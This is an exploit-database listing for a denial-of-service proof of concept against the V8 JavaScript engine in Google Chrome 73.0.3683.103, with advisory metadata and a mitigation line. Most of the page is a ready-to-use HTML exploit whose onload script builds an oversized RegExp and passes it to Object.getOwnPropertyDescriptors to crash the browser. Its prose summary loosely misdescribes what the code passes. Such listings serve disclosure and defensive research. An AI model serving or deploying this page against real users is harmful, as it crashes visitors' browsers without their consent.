Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)

vendor:

Google Chrome

by:

Bogdan Kurinnoy

7.5

CVSS

HIGH

Out-of-memory in invalid table size

119

CWE

Product Name: Google Chrome

Affected Version From: Google Chrome 73.0.3683.103

Affected Version To: Google Chrome 73.0.3683.103

Patch Exists: YES

Related CWE: N/A

CPE: a:google:chrome

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows x64

2019

Google Chrome 73.0.3683.103 V8 JavaScript Engine – Out-of-memory in invalid table size . Denial of Service (PoC)

Fatal javascript OOM in invalid table size. The vulnerability is caused by a combination of the Array constructor and the reduce() method of the Array prototype. The Array constructor is used to create an array of length 60000, and the reduce() method is used to iterate over the array. The vulnerability can be triggered by calling the Object.getOwnPropertyDescriptors() method with the array as an argument.

Mitigation:

Upgrade to the latest version of Google Chrome.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid table size 

# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->


<html>
<head>
<script>

var arr1 = [0,1];

function ObjCreate(make) {
  this.make = make;
}

var obj1 = new ObjCreate();

function main() {

	arr1.reduce(f3); 

	Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));

}

function f3() {

	obj1["make"] = RegExp(Array(60000).join("CCC")); 
}

</script>
</head>
<body onload=main()></body>
</html>